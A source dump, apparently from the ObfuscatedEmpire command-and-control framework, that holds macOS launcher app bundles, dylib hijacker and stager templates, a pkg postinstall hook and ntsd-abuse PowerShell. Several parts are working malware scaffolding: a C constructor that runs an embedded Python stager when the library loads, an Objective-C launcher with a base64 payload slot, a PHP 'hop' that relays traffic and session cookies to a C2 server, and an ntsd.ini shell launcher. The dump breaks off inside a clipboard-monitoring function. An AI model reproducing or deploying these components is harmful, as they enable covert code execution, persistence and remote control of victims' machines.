16 | 	<string>launcher</string>
17 | 	<key>CFBundlePackageType</key>
18 | 	<string>APPL</string>
19 | 	<key>CFBundleShortVersionString</key>
20 | 	<string>1.0</string>
21 | 	<key>CFBundleSignature</key>
22 | 	<string>????</string>
23 | 	<key>CFBundleSupportedPlatforms</key>
24 | 	<array>
25 | 		<string>MacOSX</string>
26 | 	</array>
27 | 	<key>CFBundleVersion</key>
28 | 	<string>1</string>
29 | 	<key>DTCompiler</key>
30 | 	<string>com.apple.compilers.llvm.clang.1_0</string>
31 | 	<key>DTPlatformBuild</key>
32 | 	<string>7D1014</string>
33 | 	<key>DTPlatformVersion</key>
34 | 	<string>GM</string>
35 | 	<key>DTSDKBuild</key>
36 | 	<string>15E60</string>
37 | 	<key>DTSDKName</key>
38 | 	<string>macosx10.11</string>
39 | 	<key>DTXcode</key>
40 | 	<string>0731</string>
41 | 	<key>DTXcodeBuild</key>
42 | 	<string>7D1014</string>
43 | 	<key>LSMinimumSystemVersion</key>
44 | 	<string>10.11</string>
45 | 	<key>LSUIElement</key>
46 | 	<true/>
47 | 	<key>NSHumanReadableCopyright</key>
48 | 	<string>Copyright © 2016 Apple. All rights reserved.</string>
49 | 	<key>NSMainNibFile</key>
50 | 	<string>MainMenu</string>
51 | 	<key>NSPrincipalClass</key>
52 | 	<string>NSApplication</string>
53 | </dict>
54 | </plist>
55 | 


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x64/launcher.app/Contents/MacOS/launcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/x64/launcher.app/Contents/MacOS/launcher


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x64/launcher.app/Contents/PkgInfo:
--------------------------------------------------------------------------------
1 | APPL????


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x64/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/x64/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x64/launcher.app/Contents/_CodeSignature/CodeResources:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  3 | <plist version="1.0">
  4 | <dict>
  5 | 	<key>files</key>
  6 | 	<dict>
  7 | 		<key>Resources/Base.lproj/MainMenu.nib</key>
  8 | 		<dict>
  9 | 			<key>hash</key>
 10 | 			<data>
 11 | 			qzM7hpyjTG1HuQPURuKEoahDSKQ=
 12 | 			</data>
 13 | 			<key>optional</key>
 14 | 			<true/>
 15 | 		</dict>
 16 | 	</dict>
 17 | 	<key>files2</key>
 18 | 	<dict>
 19 | 		<key>Resources/Base.lproj/MainMenu.nib</key>
 20 | 		<dict>
 21 | 			<key>hash</key>
 22 | 			<data>
 23 | 			qzM7hpyjTG1HuQPURuKEoahDSKQ=
 24 | 			</data>
 25 | 			<key>hash2</key>
 26 | 			<data>
 27 | 			ZXrFHjOdrZig+0unotC+3J2bMrEBQMMgmgLfXQBAB0k=
 28 | 			</data>
 29 | 			<key>optional</key>
 30 | 			<true/>
 31 | 		</dict>
 32 | 	</dict>
 33 | 	<key>rules</key>
 34 | 	<dict>
 35 | 		<key>^Resources/</key>
 36 | 		<true/>
 37 | 		<key>^Resources/.*\.lproj/</key>
 38 | 		<dict>
 39 | 			<key>optional</key>
 40 | 			<true/>
 41 | 			<key>weight</key>
 42 | 			<real>1000</real>
 43 | 		</dict>
 44 | 		<key>^Resources/.*\.lproj/locversion.plist$</key>
 45 | 		<dict>
 46 | 			<key>omit</key>
 47 | 			<true/>
 48 | 			<key>weight</key>
 49 | 			<real>1100</real>
 50 | 		</dict>
 51 | 		<key>^version.plist$</key>
 52 | 		<true/>
 53 | 	</dict>
 54 | 	<key>rules2</key>
 55 | 	<dict>
 56 | 		<key>.*\.dSYM($|/)</key>
 57 | 		<dict>
 58 | 			<key>weight</key>
 59 | 			<real>11</real>
 60 | 		</dict>
 61 | 		<key>^(.*/)?\.DS_Store$</key>
 62 | 		<dict>
 63 | 			<key>omit</key>
 64 | 			<true/>
 65 | 			<key>weight</key>
 66 | 			<real>2000</real>
 67 | 		</dict>
 68 | 		<key>^(Frameworks|SharedFrameworks|PlugIns|Plug-ins|XPCServices|Helpers|MacOS|Library/(Automator|Spotlight|LoginItems))/</key>
 69 | 		<dict>
 70 | 			<key>nested</key>
 71 | 			<true/>
 72 | 			<key>weight</key>
 73 | 			<real>10</real>
 74 | 		</dict>
 75 | 		<key>^.*</key>
 76 | 		<true/>
 77 | 		<key>^Info\.plist$</key>
 78 | 		<dict>
 79 | 			<key>omit</key>
 80 | 			<true/>
 81 | 			<key>weight</key>
 82 | 			<real>20</real>
 83 | 		</dict>
 84 | 		<key>^PkgInfo$</key>
 85 | 		<dict>
 86 | 			<key>omit</key>
 87 | 			<true/>
 88 | 			<key>weight</key>
 89 | 			<real>20</real>
 90 | 		</dict>
 91 | 		<key>^Resources/</key>
 92 | 		<dict>
 93 | 			<key>weight</key>
 94 | 			<real>20</real>
 95 | 		</dict>
 96 | 		<key>^Resources/.*\.lproj/</key>
 97 | 		<dict>
 98 | 			<key>optional</key>
 99 | 			<true/>
100 | 			<key>weight</key>
101 | 			<real>1000</real>
102 | 		</dict>
103 | 		<key>^Resources/.*\.lproj/locversion.plist$</key>
104 | 		<dict>
105 | 			<key>omit</key>
106 | 			<true/>
107 | 			<key>weight</key>
108 | 			<real>1100</real>
109 | 		</dict>
110 | 		<key>^[^/]+$</key>
111 | 		<dict>
112 | 			<key>nested</key>
113 | 			<true/>
114 | 			<key>weight</key>
115 | 			<real>10</real>
116 | 		</dict>
117 | 		<key>^embedded\.provisionprofile$</key>
118 | 		<dict>
119 | 			<key>weight</key>
120 | 			<real>20</real>
121 | 		</dict>
122 | 		<key>^version\.plist$</key>
123 | 		<dict>
124 | 			<key>weight</key>
125 | 			<real>20</real>
126 | 		</dict>
127 | 	</dict>
128 | </dict>
129 | </plist>
130 | 


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x86/launcher.app/Contents/Info.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>BuildMachineOSBuild</key>
 6 | 	<string>15G31</string>
 7 | 	<key>CFBundleDevelopmentRegion</key>
 8 | 	<string>en</string>
 9 | 	<key>CFBundleExecutable</key>
10 | 	<string>launcher</string>
11 | 	<key>CFBundleIdentifier</key>
12 | 	<string>com.apple.launcher</string>
13 | 	<key>CFBundleInfoDictionaryVersion</key>
14 | 	<string>6.0</string>
15 | 	<key>CFBundleName</key>
16 | 	<string>launcher</string>
17 | 	<key>CFBundlePackageType</key>
18 | 	<string>APPL</string>
19 | 	<key>CFBundleShortVersionString</key>
20 | 	<string>1.0</string>
21 | 	<key>CFBundleSignature</key>
22 | 	<string>????</string>
23 | 	<key>CFBundleSupportedPlatforms</key>
24 | 	<array>
25 | 		<string>MacOSX</string>
26 | 	</array>
27 | 	<key>CFBundleVersion</key>
28 | 	<string>1</string>
29 | 	<key>DTCompiler</key>
30 | 	<string>com.apple.compilers.llvm.clang.1_0</string>
31 | 	<key>DTPlatformBuild</key>
32 | 	<string>7D1014</string>
33 | 	<key>DTPlatformVersion</key>
34 | 	<string>GM</string>
35 | 	<key>DTSDKBuild</key>
36 | 	<string>15E60</string>
37 | 	<key>DTSDKName</key>
38 | 	<string>macosx10.11</string>
39 | 	<key>DTXcode</key>
40 | 	<string>0731</string>
41 | 	<key>DTXcodeBuild</key>
42 | 	<string>7D1014</string>
43 | 	<key>LSMinimumSystemVersion</key>
44 | 	<string>10.11</string>
45 | 	<key>LSUIElement</key>
46 | 	<true/>
47 | 	<key>NSHumanReadableCopyright</key>
48 | 	<string>Copyright © 2016 Apple. All rights reserved.</string>
49 | 	<key>NSMainNibFile</key>
50 | 	<string>MainMenu</string>
51 | 	<key>NSPrincipalClass</key>
52 | 	<string>NSApplication</string>
53 | </dict>
54 | </plist>
55 | 


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x86/launcher.app/Contents/MacOS/launcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/x86/launcher.app/Contents/MacOS/launcher


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x86/launcher.app/Contents/PkgInfo:
--------------------------------------------------------------------------------
1 | APPL????


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x86/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/apptemplateResources/x86/launcher.app/Contents/Resources/Base.lproj/MainMenu.nib


--------------------------------------------------------------------------------
/data/misc/apptemplateResources/x86/launcher.app/Contents/_CodeSignature/CodeResources:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  3 | <plist version="1.0">
  4 | <dict>
  5 | 	<key>files</key>
  6 | 	<dict>
  7 | 		<key>Resources/Base.lproj/MainMenu.nib</key>
  8 | 		<dict>
  9 | 			<key>hash</key>
 10 | 			<data>
 11 | 			qzM7hpyjTG1HuQPURuKEoahDSKQ=
 12 | 			</data>
 13 | 			<key>optional</key>
 14 | 			<true/>
 15 | 		</dict>
 16 | 	</dict>
 17 | 	<key>files2</key>
 18 | 	<dict>
 19 | 		<key>Resources/Base.lproj/MainMenu.nib</key>
 20 | 		<dict>
 21 | 			<key>hash</key>
 22 | 			<data>
 23 | 			qzM7hpyjTG1HuQPURuKEoahDSKQ=
 24 | 			</data>
 25 | 			<key>hash2</key>
 26 | 			<data>
 27 | 			ZXrFHjOdrZig+0unotC+3J2bMrEBQMMgmgLfXQBAB0k=
 28 | 			</data>
 29 | 			<key>optional</key>
 30 | 			<true/>
 31 | 		</dict>
 32 | 	</dict>
 33 | 	<key>rules</key>
 34 | 	<dict>
 35 | 		<key>^Resources/</key>
 36 | 		<true/>
 37 | 		<key>^Resources/.*\.lproj/</key>
 38 | 		<dict>
 39 | 			<key>optional</key>
 40 | 			<true/>
 41 | 			<key>weight</key>
 42 | 			<real>1000</real>
 43 | 		</dict>
 44 | 		<key>^Resources/.*\.lproj/locversion.plist$</key>
 45 | 		<dict>
 46 | 			<key>omit</key>
 47 | 			<true/>
 48 | 			<key>weight</key>
 49 | 			<real>1100</real>
 50 | 		</dict>
 51 | 		<key>^version.plist$</key>
 52 | 		<true/>
 53 | 	</dict>
 54 | 	<key>rules2</key>
 55 | 	<dict>
 56 | 		<key>.*\.dSYM($|/)</key>
 57 | 		<dict>
 58 | 			<key>weight</key>
 59 | 			<real>11</real>
 60 | 		</dict>
 61 | 		<key>^(.*/)?\.DS_Store$</key>
 62 | 		<dict>
 63 | 			<key>omit</key>
 64 | 			<true/>
 65 | 			<key>weight</key>
 66 | 			<real>2000</real>
 67 | 		</dict>
 68 | 		<key>^(Frameworks|SharedFrameworks|PlugIns|Plug-ins|XPCServices|Helpers|MacOS|Library/(Automator|Spotlight|LoginItems))/</key>
 69 | 		<dict>
 70 | 			<key>nested</key>
 71 | 			<true/>
 72 | 			<key>weight</key>
 73 | 			<real>10</real>
 74 | 		</dict>
 75 | 		<key>^.*</key>
 76 | 		<true/>
 77 | 		<key>^Info\.plist$</key>
 78 | 		<dict>
 79 | 			<key>omit</key>
 80 | 			<true/>
 81 | 			<key>weight</key>
 82 | 			<real>20</real>
 83 | 		</dict>
 84 | 		<key>^PkgInfo$</key>
 85 | 		<dict>
 86 | 			<key>omit</key>
 87 | 			<true/>
 88 | 			<key>weight</key>
 89 | 			<real>20</real>
 90 | 		</dict>
 91 | 		<key>^Resources/</key>
 92 | 		<dict>
 93 | 			<key>weight</key>
 94 | 			<real>20</real>
 95 | 		</dict>
 96 | 		<key>^Resources/.*\.lproj/</key>
 97 | 		<dict>
 98 | 			<key>optional</key>
 99 | 			<true/>
100 | 			<key>weight</key>
101 | 			<real>1000</real>
102 | 		</dict>
103 | 		<key>^Resources/.*\.lproj/locversion.plist$</key>
104 | 		<dict>
105 | 			<key>omit</key>
106 | 			<true/>
107 | 			<key>weight</key>
108 | 			<real>1100</real>
109 | 		</dict>
110 | 		<key>^[^/]+$</key>
111 | 		<dict>
112 | 			<key>nested</key>
113 | 			<true/>
114 | 			<key>weight</key>
115 | 			<real>10</real>
116 | 		</dict>
117 | 		<key>^embedded\.provisionprofile$</key>
118 | 		<dict>
119 | 			<key>weight</key>
120 | 			<real>20</real>
121 | 		</dict>
122 | 		<key>^version\.plist$</key>
123 | 		<dict>
124 | 			<key>weight</key>
125 | 			<real>20</real>
126 | 		</dict>
127 | 	</dict>
128 | </dict>
129 | </plist>
130 | 


--------------------------------------------------------------------------------
/data/misc/hijackers/template.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/hijackers/template.dylib


--------------------------------------------------------------------------------
/data/misc/hijackers/template64.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/hijackers/template64.dylib


--------------------------------------------------------------------------------
/data/misc/hop.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | $server = rtrim("REPLACE_SERVER", '/');
 4 | $hopName = "REPLACE_HOP_NAME";
 5 | 
 6 | 
 7 | function do_get_request($url, $optionalHeaders = null)
 8 | {
 9 |   global $hopName;
10 |   $aContext = array(
11 |     'http' => array(
12 |       'method' => 'GET'
13 |     ),
14 |     'ssl'=>array(
15 |       "verify_peer"=>false,
16 |       "verify_peer_name"=>false,
17 |     ),
18 |   );
19 |   $headers = array('Hop-Name' => $hopName);
20 |   if ($optionalHeaders !== null) {
21 |     $headers['Cookie'] = $optionalHeaders;
22 |   }
23 |   $aContext['http']['header'] = prepareHeaders($headers);
24 |   $cxContext = stream_context_create($aContext);
25 |   echo file_get_contents($url, False, $cxContext);
26 | }
27 | 
28 | 
29 | function do_post_request($url, $data, $optionalHeaders = null)
30 | {
31 |   global $hopName;
32 |   $params = array(
33 |     'http' => array(
34 |       'method' => 'POST',
35 |       'content' => $data
36 |     ),
37 |     'ssl'=>array(
38 |       'verify_peer'=>false,
39 |       'verify_peer_name'=>false,
40 |     ),
41 |   );
42 |   $headers = array('Hop-Name' => $hopName);
43 |   if ($optionalHeaders !== null) {
44 |     $headers['Cookie'] = $optionalHeaders;
45 |   }
46 |   $params['http']['header'] = prepareHeaders($headers);
47 |   $ctx = stream_context_create($params);
48 |   $fp = @fopen($url, 'rb', false, $ctx);
49 |   if (!$fp) {
50 |     return '';
51 |   }
52 |   $response = @stream_get_contents($fp);
53 |   if ($response === false) {
54 |     return '';
55 |   }
56 |   echo $response;
57 | }
58 | 
59 | function prepareHeaders($headers) {
60 |   $flattened = array();
61 | 
62 |   foreach ($headers as $key => $header) {
63 |     if (is_int($key)) {
64 |       $flattened[] = $header;
65 |     } else {
66 |       $flattened[] = $key.': '.$header;
67 |     }
68 |   }
69 | 
70 |   return implode("\r\n", $flattened);
71 | }
72 | 
73 | if ($_SERVER['REQUEST_METHOD'] === 'GET') {
74 |   $requestURI = $_SERVER['REQUEST_URI'];
75 |   if(isset($_COOKIE['session'])) {
76 |     return do_get_request($server.$requestURI, "session=".str_replace(' ', '+', $_COOKIE['session']));
77 |   }
78 |   else {
79 |     return do_get_request($server.$requestURI);
80 |   }
81 | }
82 | 
83 | else {
84 |   // otherwise it's a POST
85 |   $requestURI = $_SERVER['REQUEST_URI'];
86 |   $postdata = file_get_contents("php://input");
87 | 
88 |   if(isset($_COOKIE['session'])) {
89 |     return do_post_request($server.$requestURI, $postdata, "session=".str_replace(' ', '+', $_COOKIE['session']));
90 |   }
91 |   else {
92 |     return do_post_request($server.$requestURI, $postdata);
93 |   }
94 | }
95 | 
96 | ?>
97 | 


--------------------------------------------------------------------------------
/data/misc/machotemplate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/machotemplate


--------------------------------------------------------------------------------
/data/misc/pkgbuild/expand/PackageInfo:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8" standalone="no"?>
 2 | <pkg-info overwrite-permissions="true" relocatable="false" identifier="com.apple.APPNAME" postinstall-action="none" version="1.0" format-version="2" generator-version="InstallCmds-554 (15G31)" install-location="/" auth="root">
 3 |     <payload numberOfFiles="NUMOFFILES" installKBytes="PAYLOADSIZE"/>
 4 |     <bundle path="./APPNAME.app" id="com.apple.APPNAME" CFBundleShortVersionString="1.0" CFBundleVersion="1"/>
 5 |     <bundle-version>
 6 |         <bundle id="com.apple.APPNAME"/>
 7 |     </bundle-version>
 8 |     <upgrade-bundle>
 9 |         <bundle id="com.apple.APPNAME"/>
10 |     </upgrade-bundle>
11 |     <update-bundle/>
12 |     <atomic-update-bundle/>
13 |     <strict-identifier>
14 |         <bundle id="com.apple.APPNAME"/>
15 |     </strict-identifier>
16 |     <relocate>
17 |         <bundle id="com.apple.APPNAME"/>
18 |     </relocate>
19 |     <scripts>
20 |         <postinstall file="./postinstall"/>
21 |     </scripts>
22 | </pkg-info>
23 | 


--------------------------------------------------------------------------------
/data/misc/pkgbuild/root/Applications/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/pkgbuild/root/Applications/test


--------------------------------------------------------------------------------
/data/misc/pkgbuild/scripts/postinstall:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | LAUNCHER
4 | 
5 | exit 0


--------------------------------------------------------------------------------
/data/misc/templateLauncher.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/templateLauncher.dylib


--------------------------------------------------------------------------------
/data/misc/templateLauncher64.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/templateLauncher64.dylib


--------------------------------------------------------------------------------
/data/misc/templateSource/Dylib.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <mach-o/dyld.h>
 3 | #include <CoreServices/CoreServices.h>
 4 | #include <Python/Python.h>
 5 | #include <string.h>
 6 | #include <stdlib.h>
 7 | #include <wchar.h>
 8 | #include <assert.h>
 9 | #include <pthread.h>
10 | 
11 | void* activateStager()
12 | {
13 | 	char cmd []= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
14 |     setlocale(LC_ALL, "en_US.URF-8");
15 |     Py_Initialize();
16 |     PyRun_SimpleString(cmd);
17 |     
18 |     Py_Finalize();
19 |     return 0;
20 | }
21 | 
22 | __attribute__ ((constructor))
23 | static int initializer()
24 | {
25 |     pthread_attr_t  attr;
26 |     pthread_t       posixThreadID;
27 |     int             returnVal;
28 | 
29 |     returnVal = pthread_attr_init(&attr);
30 |     assert(!returnVal);
31 |     returnVal = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
32 |     assert(!returnVal);
33 | 
34 |     int threadError = pthread_create(&posixThreadID, &attr, &activateStager, NULL);
35 | 
36 |     return 0;
37 | }
38 | 
39 | 
40 | 


--------------------------------------------------------------------------------
/data/misc/templateSource/macho.m:
--------------------------------------------------------------------------------
 1 | #import <Foundation/Foundation.h>
 2 | #import <Python/Python.h>
 3 | #import <locale.h>
 4 | #import <Cocoa/Cocoa.h>
 5 | #import <wchar.h>
 6 | #import <string.h>
 7 | #import <stdlib.h>
 8 | 
 9 | 
10 | int main(int argc, const char * argv[]) {
11 |     //Set the locale for Py_Initialize just in case the
12 |     NSString *pyCommand = @"UEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQURQQVlMT0FEUEFZTE9BRFBBWUxPQU";
13 |     const char *command = [pyCommand cStringUsingEncoding:NSASCIIStringEncoding];
14 |     setlocale(LC_ALL, "en_US.URF-8");
15 |     Py_SetProgramName(argv[0]);
16 |     Py_Initialize();
17 |     PyRun_SimpleString(command);
18 |     
19 |     Py_Finalize();
20 |     
21 |     
22 |     return 0;
23 | }
24 | 


--------------------------------------------------------------------------------
/data/misc/xar-1.5.2.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/misc/xar-1.5.2.tar.gz


--------------------------------------------------------------------------------
/data/module_source/code_execution/Invoke-Ntsd.ps1:
--------------------------------------------------------------------------------
1 | 
2 | Function Write-Ini([string]$path, [string]$launcher)
3 | {
4 | 	# -Encoding ASCII is needed otherwise it will write in unicode
5 | 	# this will cause ntsd to not execute our code
6 | 	".shell" | Out-File -Encoding ASCII "$path\ntsd.ini"
7 | 	"$launcher" | Out-File -Encoding ASCII "$path\ntsd.ini" -Append
8 | }
9 | 


--------------------------------------------------------------------------------
/data/module_source/code_execution/ntsd_x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/module_source/code_execution/ntsd_x64.exe


--------------------------------------------------------------------------------
/data/module_source/code_execution/ntsd_x86.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/module_source/code_execution/ntsd_x86.exe


--------------------------------------------------------------------------------
/data/module_source/code_execution/ntsdexts_x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/module_source/code_execution/ntsdexts_x64.dll


--------------------------------------------------------------------------------
/data/module_source/code_execution/ntsdexts_x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cobbr/ObfuscatedEmpire/40464de6f1f21941f7fe475f0a44f7b742a5c832/data/module_source/code_execution/ntsdexts_x86.dll


--------------------------------------------------------------------------------
/data/module_source/collection/Get-ClipboardContents.ps1:
--------------------------------------------------------------------------------
 1 | function Get-ClipboardContents {
 2 | <#
 3 | .SYNOPSIS
 4 |  
 5 | Monitors the clipboard on a specified interval for changes to copied text.
 6 | 
 7 | PowerSploit Function: Get-ClipboardContents
 8 | Author: @harmj0y
 9 | License: BSD 3-Clause
10 | Required Dependencies: None
11 | Optional Dependencies: None
12 | y
13 | .PARAMETER CollectionLimit
14 | 
15 | Specifies the interval in minutes to capture clipboard text. Defaults to indefinite collection.
16 | 
17 | .PARAMETER PollInterval
18 | 
